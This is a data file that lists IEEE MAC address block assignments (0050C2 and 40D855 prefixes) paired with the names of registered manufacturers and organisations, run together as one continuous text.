0050C2C1F Specialist Electronics Services Ltd 0050C2C1D Powerbase Energy Systems Inc. 0050C2C05 Doppler Systems LLC 0050C2BE9 ZUCCHETTI SPA 0050C2BF5 AILES ELECTRONICS CO., LTD. 0050C2BF1 Amatic Industries GmbH 0050C2C12 OKI DENKI BOHSAI CO.,LTD. 0050C2C0D Fr. SauterAG 0050C2C23 Vidicon LLC 0050C2C00 ACD Elektronik GmbH 0050C2BFC Altronix Corporation 0050C2BD8 b.a.b-technologie gmbh 0050C2BD5 RF-Embedded GmbH 0050C2BD2 Percello Ltd. 0050C2BBA Systemteq Limited 0050C2BAF MangoDSP 0050C2BAC VITECO VNPT JSC 0050C2BA8 Peek Traffic Corporation 0050C2BA6 Jomitek 0050C2BCD Highlight Parking Systems Ltd 0050C2BCC VVDN TECHNOLOGIES PVT. LTD. 0050C2BCA Aitecsystem Co.,Ltd. 0050C2B9A Talo, NV Inc 0050C2BC6 MireroTack 0050C2B6B Phytec Messtechnik GmbH 0050C2B97 ikerlan 0050C2B96 Onix Electronic Systems Inc 0050C2B60 OOO NPF ATIS 0050C2B61 Nayos LTD 0050C2B77 KRISTECH 0050C2B7C Bettini srl 0050C2B7B QUARTECH CORPORATION 0050C2B56 SINOVIA SA 0050C2B31 Shop Safe AG 0050C2B2E ACT 0050C2B2A Trench Austria GmbH 0050C2B0F NARA Controls Inc. 0050C2B4A Saia-Burgess Controls AG 0050C2B15 PhotoTelesis LP 0050C2B20 FIVE9 NETWORK SYSTEMS LLC 0050C2AED 3Roam 0050C2AE9 ClearCorp Enterprises, Inc 0050C2B05 POLA s.r.l. 0050C2B07 FARECO 0050C2ADE Neoptix Inc. 0050C2AF4 Dixell S.p.A. 0050C2A95 INNOVACIONES Microelectrónicas SL (AnaFocus) 0050C2AC4 Orion Technologies,LLC 0050C2AC3 Diversified Control, Inc. 0050C2AA5 Tampere University of Technology 0050C2ACE ChronoLogic Pty. Ltd. 0050C2ACD MeshWorks Wireless Oy 0050C2A9F YellowSoft Co., Ltd. 0050C2AC0 DS PRO Audio Ltda 0050C2ABE AP Labs 0050C2AAC VisiCon GmbH 0050C2A72 Gamber-Johnson LLC. 0050C2A5E Ansen Investment Holdings Ltd. 0050C2A5A ITAS A/S 0050C2A5B Phytec Messtechnik GmbH 0050C2A70 Reliable System Services Corp 0050C2A6E Screen Technics Pty Limited 0050C2A6F Saia-Burgess Controls AG 0050C2A6D DTV Innovations 0050C2A67 GSS Avionics Limited 0050C2A64 tetronik GmbH AEN 0050C2A4B L-3 Communications Mobile-Vision, Inc. 0050C2A49 Wayne Dalton Corp. 0050C2A42 RealVision Inc. 0050C2A7D Vitel Net 0050C2A79 Saintronic 0050C2A51 Y-products co.ltd. 0050C2A8F Quantum3D, Inc. 0050C2A8D Frontier Electronic Systems Corp. 0050C2A8A Audio Engineering Ltd. 0050C2A07 Dynon Instruments 0050C2A02 Reference, LLC. 0050C2A2B APRILIA RACING S.R.L. 0050C2A27 meconet e. K. 0050C2A21 ISAC SRL 0050C29FD Bitt technology-A Ltd. 0050C2A12 HCE Engineering S.r.l. 0050C2A10 Essential Design & Integration P/L 0050C2A32 Harris Designs of NRV, Inc. 0050C2A30 D-TA Systems 0050C2A2D Inventure Inc. 0050C2A1C Microtechnica 0050C2A1B Realtime Systems Ltd. 0050C2A18 Eoslink 0050C29EE Michael Stevens & Partners Ltd 0050C29EA SISMODULAR - Engenharia, Lda 0050C2A3A Telecor Inc. 0050C2A3C Brähler ICS Konferenztechnik AG 0050C29A1 ComAp s.r.o 0050C29C9 LUMINEX Lighting Control Equipment 0050C29B6 ACTECH 0050C29D9 CNS Systems, Inc. 0050C29D5 Netpower Labs AB 0050C29DE CHAUVIN ARNOUX 0050C29DB Walter Grotkasten 0050C29BD Sensitron Semiconductor 0050C29BC Kistler Straubenhardt GmbH 0050C29E2 E-ViEWS SAFETY SYSTEMS, INC 0050C29C5 Scansonic MI GmbH 0050C29C2 Team Enginers 0050C29C1 Tattile srl 0050C2993 UNETCONVERGENCE CO., LTD 0050C298F BELIK S.P.R.L. 0050C296B Electronic Media Services Ltd 0050C298E Link Technologies, Inc 0050C2560 Procon Electronics 0050C2989 Psigenics Corporation 0050C283E KPE spol. s r.o. 0050C2978 LOGITAL DIGITAL MEDIA srl 0050C296A Bittium Wireless Ltd 0050C2962 Shockfish SA 0050C2963 Lécureux SA 0050C2986 DSCI 0050C2987 Joinsoon Electronics MFG. Co., Ltd 0050C297F C&I Co.Ltd 0050C2972 Switch Science (Panini Keikaku) 0050C299E Engage Technologies 0050C29A0 Trs Systems, Inc. 0050C295E BEEcube Inc. 0050C2942 Keith & Koep GmbH 0050C2951 EL.C.A. soc. coop. 0050C2950 Tele and Radio Research Institute 0050C2949 taskit GmbH 0050C2948 ELECTRONIA 0050C2959 DECTRIS Ltd. 0050C2954 Phytec Messtechnik GmbH 0050C294C TEMIX 0050C293C FractureCode Corporation 0050C293A ALPHATRONICS nv 0050C2924 Link Electric & Safety Control Co. 0050C291F 2NCOMM DESIGN SRL 0050C2918 Design Lightning Corp 0050C2910 Autotank AB 0050C2912 ASSET InterTech, Inc. 0050C28F6 K-MAC Corp. 0050C28F5 tec5 AG 0050C2908 Codex Digital Ltd 0050C2901 Research Applications Incorp 0050C28FA TELIUM s.c. 0050C28F2 Schneider Electric GmbH 0050C28C5 Vortex Engineering pvt ltd 0050C28E1 Deutscher Weterdienst 0050C28E0 Shenzhen Pennda Technologies Co., Ltd. 0050C28E5 Berthel GmbH 0050C28E4 MaCaPS International Limited 0050C28CE Phytec Messtechnik GmbH 0050C28CD Cambridge Sound Management, LLC 0050C28B6 Shadrinskiy Telefonny Zavod 0050C28B2 SERVAIND SA. 0050C2892 Trakce a.s. 0050C2887 Inventis Technology Pty Limited 0050C2889 ACS Motion Control Ltd. 0050C28A0 Specialized Communications Corp. 0050C289C Mediana 0050C2885 OOO "NTK "IMOS" 0050C2884 IP Thinking A/S 0050C2880 Creation Technologies Chicago 0050C287E SCM PRODUCTS, INC. 0050C2898 Veeco Process Equipment, Inc. 0050C2897 ODF Optronics, Inc. 0050C285E Radiometer Medical ApS 0050C2876 Privatquelle Gruber GmbH & CO KG 0050C2874 Arcos Technologies Ltd. 0050C2862 Elsys AG 0050C284D BMTI 0050C282C Vitel Net 0050C282A VDC Display Systems 0050C2839 IMS Röntgensysteme GmbH 0050C2836 DSP DESIGN 0050C2835 Communications Laboratories Inc 0050C2831 St Jude Medical, Inc. 0050C2824 SMT d.o.o. 0050C284A Keystone Electronic Solutions 0050C2841 Connection Electronics Ltd. 0050C2842 Quantum Controls BV 0050C27FF Shenzhen MaiWei Cable TV Equipment CO.,LTD. 0050C27FD Adeneo 0050C27FE Wireless Cables Inc. 0050C2819 Cabinplant A/S 0050C27F6 Saia-Burgess Controls AG 0050C27F5 ACE Carwash Systems 0050C27EF GFI Chrono Time 0050C27F0 Network Harbor, Inc. 0050C27F1 STUHL Regelsysteme GmbH 0050C27EB Sesol Industrial Computer 0050C27ED Genesis Automation Inc. 0050C280B Open Video, Inc. 0050C2806 CET 0050C2805 MultimediaLED 0050C2801 JANUS srl 0050C27D1 Phytec Messtechnik GmbH 0050C27D2 Bittitalo Oy 0050C27DC aiXtrusion GmbH 0050C27D8 InnoScan K/S 0050C27B7 Tattile srl 0050C27B5 DIT-MCO International 0050C27CB ViewPlus Technologies, Inc. 0050C27C6 Lyngdorf Audio Aps 0050C27AF C2 Microsystems 0050C2776 Integrated Security Corporation 0050C2772 IES Elektronikentwicklung 0050C2791 M Squared Lasers Limited 0050C276E Crinia Corporation 0050C2768 Control Service do Brasil Ltda 0050C2788 HOSA TECHNOLOGY, INC. 0050C2785 Icon Time Systems 0050C275A Gaisler Research AB 0050C275C STÖRK-TRONIC Störk GmbH&Co. KG 0050C2741 Dain 0050C273E Quantec Networks GmbH 0050C273F MEDAV GmbH 0050C273C Simicon 0050C2732 Schlumberger K.K. 0050C2731 Spirent Communications 0050C2730 haber & koenig electronics gmbh 0050C2748 Letechnic Ltd 0050C274A MONITOR ELECTRONICS LTD 0050C2758 AixSolve GmbH 0050C274F German Technologies 0050C2735 Ant Lamp, Inc 0050C26F9 Revox GmbH 0050C26F7 infoplan Gesellschaftfür Informationssysteme mbH 0050C2728 InterDigital Canada Ltd 0050C2721 Spectrum Communications FZE 0050C271D MG s.r.l. 0050C271C Elmec Inc. 0050C272C Richard Griessbach Feinmechanik GmbH 0050C272D Physical Acoustics Corporation 0050C26FE Blue Origin 0050C26FF St. Michael Strategies Inc. 0050C2711 LINKIT S.R.L. 0050C270D ela-soft GmbH & Co. KG 0050C2708 Smartek d.o.o. 0050C2706 DioDigiWorks. CO., LTD. 0050C2718 illunis LLC 0050C26F5 Kitron Microelectronics AB 0050C26F2 Laser Electronics Ltd 0050C26C7 QuickCircuit Ltd. 0050C26C5 Oerlikon Contraves AG 0050C26E8 Anymax 0050C26D0 EDS Systemtechnik 0050C26BA Fertron Controle e Automacao Industrial Ltda. 0050C26BB Ele.Mag S.r.l. 0050C26B9 unipo GmbH 0050C268D CXR Larus Corporation 0050C26AB Softwareentwicklung 0050C269F Total RF, LLC 0050C26B0 Smart Key International Limited 0050C26AD Heim- & Bürokommunikation 0050C26B5 TRIUMF 0050C2676 EDS 0050C267D ESA Messtechnik GmbH 0050C2680 Honey Network Research Limited 0050C2677 ProconX Pty Ltd 0050C2678 IHM 0050C267A CC Systems AB 0050C266E Linear Systems Ltd. 0050C2665 NetworkSound, Inc 0050C2646 TRUTOUCH TECHNOLOGIES INC 0050C266C DESY 0050C2653 Doble Engineering 0050C2654 PaloDEx Group Oy 0050C265A Hisstema AB 0050C2643 Enatel Limited 0050C2631 Fraunhofer IIS 0050C2628 DARE Development 0050C262A Prisma Engineering srl 0050C2611 Brookhaven National Laboratory 0050C2610 FDT Manufacturing, LLC 0050C2621 Version-T 0050C2625 EBNeuro SpA 0050C261E LESTER ELECTRONICS LTD 0050C25EC ASiS Technologies Pte Ltd 0050C25E6 Musatel 0050C25E7 EADS TEST & SERVICES 0050C25E0 Phytec Messtechnik GmbH 0050C25E1 Ittiam Systems (P) Ltd 0050C25DD SomerData ltd 0050C260F Kommunikations- & Sicherheitssysteme Gesellschaft m.b.H 0050C25F9 ROTHARY Solutions AG 0050C25CB Kobold Sistemi s.r.l. 0050C25CD RADA Electronics Industries Ltd. 0050C25CE Roke Manor Research Ltd 0050C25A9 AYC Telecom Ltd 0050C25C3 KS System GmbH 0050C25BE Card Access Services Pty Ltd 0050C25C1 R. L. Drake Company 0050C25CA Buyang Electronics Industrial Co., Ltd. 0050C25C8 Georgia Tech Research Institute 0050C25B4 Terrascience Systems Ltd. 0050C256B Dataton Utvecklings AB 0050C2569 Twinwin Technplogy Co.,Ltd. 0050C2599 Fen Technology Limited 0050C258E Penny & Giles Aerospace Ltd 0050C259B SAPEC 0050C259C DELSAT GROUP S.A. 0050C2596 SPANSION 0050C2595 Callpod, Inc. 0050C2581 Devitech ApS 0050C2579 Gastager Systemtechnik GmbH 0050C2589 HORIBA ABX SAS 0050C258C Lattice Semiconductor Corp. (LPA) 0050C2549 Netsynt S.p.A. 0050C2547 BLANKOM Antennentechnik GmbH 0050C2531 Orion Technologies,LLC 0050C252E DSP DESIGN 0050C252C VITEC MULTIMEDIA 0050C254A IPTC Tech. Comm. AB 0050C253A Image Control Design Limited 0050C2503 RESPIRONICS INC. 0050C24FE GEM ELETTRONICA Srl 0050C24EF Creative Retail Entertainment 0050C24D0 RCS Energy Management Ltd 0050C24D1 SLICAN sp. z o.o. 0050C24CF Ziehl-Abegg AG 0050C24D9 GE Security Kampro 0050C24D6 Ingenieurbüro Schober 0050C24E8 SATEL sp. z o.o. 0050C24CE Open Date Equipment Limited 0050C24C9 Scirocco AB 0050C24AC Doramu Co.,Ltd. 0050C24AD OpenPeak, Inc. 0050C24AB JVF Communications Ltd 0050C24A9 Faber Electronics BV 0050C24B7 GFI Chrono Time 0050C24B8 Shenzhen Hongdian Technologies.,Ltd 0050C24B9 Rose Technologies 0050C249A TelASIC Communications, Inc. 0050C2499 Trellia Networks 0050C2486 Safegate International AB 0050C24A2 SPECS GmbH 0050C2467 United Western Technologies 0050C2466 LONAP Limited 0050C2481 Computer Sciences Corp 0050C247D WIT Inc 0050C2473 Sensus Metering Systems Israel 0050C242D Argo-Tech 0050C2436 Satellite Services BV 0050C2435 ADATEL TELECOMUNICACIONES S.A. 0050C241D Altronic, Inc. 0050C244C Computime Systems UK Ltd. 0050C2428 Roxar A/S 0050C23EE Commoca, Inc 0050C23F6 dAFTdATA Limited 0050C23EF PAT Industries, DBA Pacific Advanced Technology 0050C23F2 STL GmbH 0050C23FE HaiVision Systems Inc 0050C23F8 Superna Ltd 0050C23FA Tumsan 0050C23D9 Bavaria Digital Technik GmbH 0050C23D8 Key Systems , Inc. 0050C2408 TERN, Inc. 0050C23C2 Casabyte Inc. 0050C23BC Tyzx, Inc. 0050C23CA ABB Inc. 0050C23C4 Sypris Electronics 0050C23BE Pauly Steuer- und Regelanlagen GmbH & Co. KG 0050C23A3 Star Link Communication Pvt. Ltd. 0050C23AD Spirent Communications (Scotland) Limited 0050C239C TIYODA MFG CO.,LTD. 0050C2394 Embedit A/S 0050C2391 Esensors, Inc. 0050C238F TTC Telecom 0050C236D Oplink Communications 0050C236A Optronic Partner pr AB 0050C2367 CANMAX Technology Ltd. 0050C2366 Vanguard Technology Corp. 0050C237D VeroTrak Inc. 0050C237B Freescale Semiconductor 0050C2372 ELV Elektronik AG 0050C2385 SUNGJIN NEOTECH Co.Ltd. 0050C2370 Europe Technologies 0050C2371 DIGITAL ART SYSTEM 0050C2364 Tattile srl 0050C2357 Athena Semiconductor 0050C233F EXYS bvba 0050C2322 BQT Solutions (Australia) Limited 0050C2323 Red Rock Networks 0050C232C Integrated Silicon Solution (Taiwan), Inc. 0050C231A Zodiak Data Systems 0050C2319 Invatron Systems Corp. 0050C234A NIE Corporation 0050C234E ABB Power Technologies S.p.A. Unità  Operativa SACE (PTMV) 0050C2347 Row Seven Ltd 0050C2354 Advanced IP Communications 0050C2318 Milmega Ltd 0050C2315 ifak system GmbH 0050C2306 Noran Tel Communications Ltd. 0050C2308 FiveCo 0050C2305 Symbium Corporation 0050C22E8 S.M.V. Systemelektronik GmbH 0050C22DF MICREL-NKE 0050C22E1 Access IS 0050C22DD Westek Technology Ltd 0050C2311 Comodo 0050C230C TEAMLOG 0050C22E9 SRI International 0050C22EF Profline B.V. 0050C22DB AutoTOOLS group Co. Ltd. 0050C22FC Blackline Systems Corporation 0050C22FF Patria Advanced Solutions 0050C22A1 Infinetix Corp 0050C22D2 AIRNET COMMUNICATIONS CORP 0050C22C9 Roseman Engineering Ltd. 0050C22CA PUTERCOM CO., LTD 0050C22CC EMBEDDED TOOLSMITHS 0050C22C4 Invensys Energy Systens (NZ) Limited 0050C22C1 Stage Tec Entwicklungsgesellschaft für professionelle Audio 0050C22CF Diseño de Sistemas en Silicio S.A. 0050C22D1 Miritek, Inc. 0050C22A4 Xipher Embedded Networking 0050C22B3 Embedded Systems Design 0050C2296 OpVista 0050C2271 VLSIP TECHNOLOGIES INC. 0050C2275 Extreme Engineering Solutions 0050C2287 TECNEW Electronics Engineering Cr., Ltd. 0050C2286 ATEME 0050C2281 Cabtronix AG 0050C2270 S4 Technology Pty Ltd 0050C22A2 Epelsa, SL 0050C2283 ANSITEX CORP. 0050C2278 Replicom Ltd. 0050C226D DSP DESIGN 0050C2243 RGB Spectrum 0050C224A CDS Rail 0050C2262 Shanghai Gaozhi Science&Technology Development Ltd. 0050C2261 Tattile Srl 0050C2260 BIOTAGE 0050C2240 Geoquip Ltd 0050C223E Kallastra Inc. 0050C220F OMICRON electronics GmbH 0050C2210 Innovics Wireless Inc 0050C2231 Legra Systems, Inc. 0050C222B Riegl Laser Measurement Systems GmbH 0050C2214 Oshimi System Design Inc. 0050C2218 Nansen S. A. - Instrumentos de Precisão 0050C2220 Serveron Corporation 0050C223C Wheatstone Corporation 0050C21F0 EXI Wireless Systems Inc. 0050C21F8 ULTRACKER TECHNOLOGY 0050C21F9 Fr. Sauter AG 0050C2200 Whittier Mailing Products, Inc. 0050C21FF Product Design Dept., Sohwa Corporation 0050C21E8 Metrotech 0050C220C Communication and Telemechanical Systems Company Limited 0050C21DE ReliOn Inc. 0050C21D1 Benchmark Electronics 0050C21BF International Test & Engineering Services Co.,Ltd. 0050C21D9 EDC 0050C21D2 Shenyang Internet Technology Inc 0050C21C4 Palm Solutions Group 0050C21B6 DTS, Inc. 0050C219A AZIO TECHNOLOGY CO. 0050C2195 Momentum Data Systems 0050C21B4 DSP Group Inc. 0050C21B2 SIGOS Systemintegration GmbH 0050C219F Fleetwood Electronics Ltd 0050C2198 PotsTek, Inc 0050C2196 Netsynt Spa 0050C21AC Beckmann+Egle GmbH 0050C2193 LaserBit Communications Corp. 0050C2189 CC Systems AB 0050C2175 Sei S.p.A. 0050C218F MATSUI MFG CO.,LTD 0050C2187 Cyan Technology Ltd 0050C2184 H M Computing Limited 0050C2173 DeMeTec GmbH 0050C2166 Infineer Ltd. 0050C2165 IPCAST 0050C2167 Precision Filters, Inc. 0050C215E Celite Systems, Inc. 0050C2003 Microsoft 0050C2169 Nordson Corp. 0050C2063 Ticketmaster Corp 0050C214F Telephonics Corp. 0050C214B HECUBA Elektronik 0050C214A DYCEC, S.A. 0050C2140 ITS, Inc. 0050C212E RUNCOM 0050C2120 XStore, Inc. 0050C2129 TTPCom Ltd. 0050C210F Perceptics Corp. 0050C2108 Balogh S.A. 0050C210B MarekMicro GmbH 0050C2104 Adescom Inc. 0050C20FE Energy ICT 0050C2114 Quest Innovations 0050C20EC Keith & Koep GmbH 0050C20EF Movaz Networks, Inc. 0050C20E3 Lanex S.A. 0050C20FA GE Transportation Systems 0050C20D8 Charlotte's Web Networks 0050C20D7 Summit Avionics, Inc. 0050C20DD Interisa Electronica, S.A. 0050C20E1 Inspiration Technology P/L 0050C20DA Motion Analysis Corp. 0050C20B2 R F Micro Devices 0050C20B3 SMX Corporation 0050C20BC Infolink Software AG 0050C20AC Honeywell GNO 0050C20A8 Kaveri Networks 0050C20A6 Arula Systems, Inc. 0050C20AB Fastware.Net, LLC 0050C20AA Log-In, Inc. 0050C209D ZELPOS 0050C2091 StorLogic, Inc. 0050C208F General Industries Argentina 0050C2097 IMV Invertomatic 0050C2085 Crossport Systems 0050C207F Dunti Corporation 0050C2077 Saco Smartvision Inc. 0050C2076 Litton Guidance & Control Systems 0050C207A RadioTel 0050C2074 Edge Tech Co., Ltd. 0050C2072 Neuberger Gebaeudeautomation GmbH & Co. 0050C205E DIVA Systems 0050C205D Ignitus Communications, LLC 0050C205C Nortel Networks PLC (UK) 0050C205B Radiometer Medical A/S 0050C2047 B. R. Electronics 0050C2051 JSR Ultrasonics 0050C204F Luma Corporation 0050C204C New Standard Engineering NV 0050C202D Innocor LTD 0050C2031 Eloquence Ltd 0050C2039 Apex Signal Corp 0050C2020 Icon Research Ltd. 0050C2021 DRS Technologies Canada Co. 0050C21A6 RF Code 0050C2DB1 RF Code 0050C2469 Bipom Electronics, Inc. 0050C2CF2 Weiss Robotics GmbH & Co. KG 0050C25F0 DIAS Infrared GmbH 0050C2F48 SHURE INCORPORATED 0050C2597 Nautel LTD 0050C2C08 juiceboss 0050C256D Computrol Fuel Systems Inc. 40D8550F0 Redwood Systems 0050C2E66 EMAC, Inc. 0050C23D4 Wisnu and Supak Co.,Ltd. 0050C288D L3 Communications Nova Engineering 0050C2139 SR RESEARCH LTD 0050C25E3 Computechnic AG 0050C2856 CT Company 0050C2DCB CT Company 0050C2B6F CT Company 0050C2E92 CT Company 40D8550C8 Mettler Toledo 0050C2B75 Blankom 0050C2DE0 INTERNET PROTOCOLO LOGICA SL 40D855076 INTERNET PROTOCOLO LOGICA SL 0050C2CB3 DEUTA-WERKE GmbH 0050C29EF WoKa-Elektronik GmbH 0050C253E Honeywell 0050C2204 Algodue Elettronica Srl 40D8550C3 APG Cash Drawer, LLC 0050C2D3F Communication Systems Solutions 0050C2404 NanShanBridge Co.Ltd 0050C2FB6 ARGUS-SPECTRUM 0050C25B6 Kontron (BeiJing) Technology Co.,Ltd 0050C239B YUYAMA MFG Co.,Ltd 0050C23CB Analytica GmbH 0050C2FF1 DiTEST Fahrzeugdiagnose GmbH 40D855020 ENTEC Electric & Electronic CO., LTD. 0050C2E3D Baudisch Electronic GmbH 0050C2BD1 Ariem Technologies Pvt Ltd 0050C244F kippdata GmbH 0050C265B Silverbrook Research 0050C239A Optical Air Data Systems 0050C263F SPEECH TECHNOLOGY CENTER LIMITED 0050C2392 Phytec Messtechnik GmbH 0050C232A Phytec Messtechnik GmbH 0050C2782 Phytec Messtechnik GmbH 0050C23E9 MedAvant Healthcare 0050C277E Cominfo, Inc. 0050C2604 HCJB Global 0050C2F64 Chrisso Technologies LLC 0050C250C AIRWISE TECHNOLOGY CO., LTD. 0050C2455 Gogo BA 0050C2163 Computerwise, Inc. 0050C2909 Elisra 0050C2DF4 Potter Electric Signal Co. LLC 0050C2B9C DAVE SRL 0050C2F3E Vtron Pty Ltd 0050C22F0 LECO Corporation 0050C2BC2 Xslent Energy Technologies. LLC 0050C2188 dresden-elektronik 0050C2D9E Vocality International Ltd 0050C26A5 EATON FHF Funke + Huster Fernsig GmbH 0050C28FB Alfred Kuhse GmbH 0050C266A ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C27A3 ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C2B92 ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C2CDC ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C2EEE ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C2F8D Guangdong East Power Co., 0050C2E4B Rohde&Schwarz Topex SA 0050C2F52 Rohde&Schwarz Topex SA 0050C2FC0 Rohde&Schwarz Topex SA 0050C2F6F Aplex Technology Inc. 0050C2EC3 Aplex Technology Inc. 0050C2D11 Aplex Technology Inc. 0050C2186 Pantec Engineering AG 0050C2594 Pixel Velocity, Inc 0050C2FB7 Pounce Consulting 40D8551DC Aplex Technology Inc. 40D85516A Aplex Technology Inc. 40D855147 Aplex Technology Inc. 0050C285A ART SPA 0050C2585 Wireless Cables Inc. 0050C2723 Power Electronics Espana, S.L. 0050C2AC7 WaveIP 0050C24F7 WaveIP 0050C2ADD GD Mission Systems 0050C2B19 Polytron Corporation 0050C2A6B Explorer Inc. 0050C2807 TECHNOMARK 0050C2393 SYS TEC electronic GmbH 0050C2D19 Applied Medical Technologies, Inc DBA AirClean Systems 0050C223B Envara 0050C2015 LEROY AUTOMATION 0050C2359 Kramer Electronics Ltd. 0050C252B Sicon srl 0050C2C3A Sicon srl 0050C2D8B Sicon srl 0050C25AB Eaton Corp. Electrical Group Data Center Solutions - Pulizzi 0050C2620 Harman/Becker Automotive Systems GmbH 0050C2D5F Embedded Solution Bank Co., Ltd. 0050C277B Itibia Technologies 0050C244A Elettronica Santerno SpA 0050C2F53 BAYCOM OPTO-ELECTRONICS TECHNOLGY CO., LTD. 0050C24D7 DELTA TAU DATA SYSTEMS, INC. 0050C2033 Doble Engineering 0050C2029 Grossenbacher Systeme AG 0050C2A62 Grossenbacher Systeme AG 0050C2F1D Grossenbacher Systeme AG 0050C2066 Private 0050C2C0C Altierre 0050C2F35 Grupo Epelsa S.L. 0050C2E3C Grupo Epelsa S.L. 0050C28C7 TATTILE SRL 0050C2493 Artis GmbH 0050C283D beroNet GmbH 0050C2886 Wartsila Voyage Limited 40D85519D EMAC, Inc. 0050C2CC7 TOPROOTTechnology Corp. Ltd. 0050C24CD Securiton AG 40D8551D2 InventLab s.c. 40D8551CD YXLON International A/S 40D8551C3 Cornfed Systems LLC 40D8551C2 Digital Display Systems 40D8551C8 Sensata Technologies 40D8551C9 Andy-L Ltd. 40D8551C7 Wexiodisk AB 40D8551E4 STEK Ltd 40D8551BF shanghai mingding information tech co.Ltd 40D8551BE Peek Traffic 40D855196 Advanced Micro Controls Inc. 40D855197 Berg Cloud Limited 40D8551BB Micromega Dynamics SA 40D8551B5 A+EC Klein Ingenieurbuero 40D8551A9 Lubino s.r.o. 40D855195 TONNA ELECTRONIQUE 40D855192 GD Mission Systems 40D85517D Kiwigrid GmbH 40D855180 BroadSoft Inc 40D85516C Private 40D855187 CDEX Corp. 40D855176 Schneider Electric Motion, Inc. USA 40D85518D Zoe Medical 40D85518C EOS S.r.l. 40D855174 EcoGuard AB 40D855150 SHIKINO HIGH-TECH 40D855149 Engage Technologies 40D855156 Emphysys, Inc. 40D85512E Canfield Scientific, Inc. 40D85513B Davin Technologies Co.,Ltd 40D85513A Supplier Ind. e Com de Eletroeletrônicos 40D85510A DAVIS DERBY LIMITED 40D855106 Orbital A/S 40D85510E HKS-Prozesstechnik GmbH 40D855138 Calon Associates Limited 40D85512A Jadpod Communication Company Limited 40D855115 MESA Electronic GmbH 40D85511D ACD Elektronik GmbH 40D855118 University of Nebraska -- Lincoln 40D85511E CEMSI, Inc. 40D855105 Tieline Research Pty Ltd 40D8550FE Cytech Technology Pte Ltd 40D8550E0 Richter 40D8550F2 SigmaPhi Electronics 40D8550DA Devialet SA 40D8550FB InfoMac Sp. z o. o. Sp. k. 40D8550CC ATEME 40D8550C6 comtime GmbH 40D8550D5 Shimizu Electric Co., Ltd. 40D8550A9 Apantac LLC 40D8550AB Enel doo Belgrade 40D8550B9 WxBR Sistemas de Telecomunicacoes Ltda 40D8550CA NEUTRIK AG 40D855094 Nomad Digital Limited 40D855087 Bestel China 40D855088 JEL SYSTEM CO., LTD. 40D85508D Boehme Nachrichtentechnik 40D855097 Burton Technical Services LLC 40D85507A 4embedded 40D855077 TOEC TECHNOLOGY CO.,LTD 40D855078 NACHI-FUJIKOSHI CORP 40D855074 Sphere Medical Ltd 40D8550A2 Xemex NV 40D855065 Parallel Wireless 40D85505B Data Flow Systems, Inc. 40D85503E Vishay Celtron Technologies, Inc. 40D85503F UniSVR Global Information Technology Corp. 40D85503D Tekelek Europe Ltd 40D855028 Integrated Control Corp. 40D855025 Rosemount Analytical 40D855032 BETTINI SRL 40D855030 Tecnologias Plexus 40D855037 Software Workshop 40D85504A Gateway Technologies SA de CV 40D855047 Dos&Donts SRL 40D855014 Toni Studio 0050C2FF7 Human Intech 0050C2FF9 AVA Monitoring AB 0050C2FF5 Flexkom Internet Pazarlama Bilipim ve Eoitim Hiz.Inp.Mim.Muh.Oto.Enerji San. Tic. A.p. 40D85500A Sarana Sistem Mikro 40D855005 Monarch Instrument 0050C2FE3 Private 0050C2FE2 Pulsotronic Anlagentechnik GmbH 0050C2FF4 Burk Technology 0050C2FF2 GLOBALCOM ENGINEERING SRL 0050C2FC8 Far South Networks 0050C2FC1 Motec Pty Ltd 0050C2FBC Leroy Somer 0050C2FBB ACIDA GmbH 0050C2FCD Jinyoung Contech 0050C2FCA Telemisis Ltd 0050C2FC9 Mehta Tech, Inc. 0050C2FDE Peek Traffic 0050C2FDF ACD Elektronik GmbH 0050C2FDB The Security Center Inc 0050C2FE1 dotOcean 0050C2FC2 ELTA 0050C2F85 Enetics, Inc. 0050C2F99 Dr. Neumann elektronik GmbH 0050C2F98 Infotech North America 0050C2FA7 Exelis Inc. 0050C2F82 Sincair Systems International 0050C2F83 GSP Sprachtechnologie GmbH 0050C2F81 PLDA 0050C2F95 TTi LTD (Thurlby Thandar Instruments LTD) 0050C2F9C R&D KOMETEH 0050C2F9A Telvent 0050C2FB0 Tateishi Kobisha Co.LTD 0050C2F7C Atonometrics, Inc. 0050C2F77 SYSTEMTECHNIK GmbH 0050C2F69 Safe Place Solutions Ltd 0050C2F67 Celestial Audio 0050C2F60 Deckma GmbH 0050C2F61 Brauch Elektronik GmbH&Co.KG 0050C2F7E TruTeq Wireless (Pty) Ltd 0050C2F34 Sequip S+E GmbH 0050C2F2A ACD Elektronik GmbH 0050C2F23 Electro-Motive Diesel 0050C2F20 Unfors Instruments AB 0050C2F44 Steinbichler Optotechnik GmbH 0050C2F42 DSPCon 0050C2F2E H&L Instruments, LLC 0050C2F36 Visitech AS 0050C2F38 AeroControl, Inc. 0050C2F4A Z-App Systems, Inc. 0050C2F1E Dell'Orto S.P.A. 0050C2EF7 Amstelland Electronic BV 0050C2EF5 Human Network Labs, Inc. 0050C2EFA Predictive Sensor Technology 0050C2EFF Zephyrus Electronics LTD. 0050C2F0A HASCOM International Pty Ltd 0050C2F07 Icon Research Ltd 0050C2F10 Wincor Nixdorf Sp. z o.o. 0050C2F0D Bluetest AB 0050C2F0F AeroVision Avionics, Inc. 0050C2F1A Aqua Management 0050C2EE0 osf Hansjuergen Meier GmbH & Co. KG 0050C2ECC Saia-Burgess Controls AG 0050C2ECD Peek Traffic Corporation 0050C2ECA BitWise Controls 0050C2ECE easii ic adiis 0050C2EB1 PDU EXPERT UK LTD 0050C2EB7 Saab AB 0050C2EBD Droplet Measurement Technologies 0050C2EBA West-Com Nurse Call Systems, Inc. 0050C2EC6 INFRONICS SYSTEMS LIMITED 0050C2E97 Arista Systems Corporation 0050C2E83 Witree Co.,Ltd 0050C2EA6 Powersense A/S 0050C2E8F STT Condigi A/S 0050C2E9F DataSoft Corporation 0050C2E5E OREP 0050C2E5A FUTEC INC. 0050C2E65 IB Elektronik GmbH 0050C2E77 Fr. Sauter AG 0050C2E48 ITW Reyflex North America 0050C2E46 Industrea Mining Technology 0050C2E40 Ecrin Systems 0050C2E4D PCSC 0050C2E53 NEXT video systems Hard- and Software Development GmbH 0050C2E21 Norwia AS 0050C2E20 Divelbiss Corporation 0050C2E1D Holdline Tecnologia e Sistemas Ltda 0050C2E35 Omnica 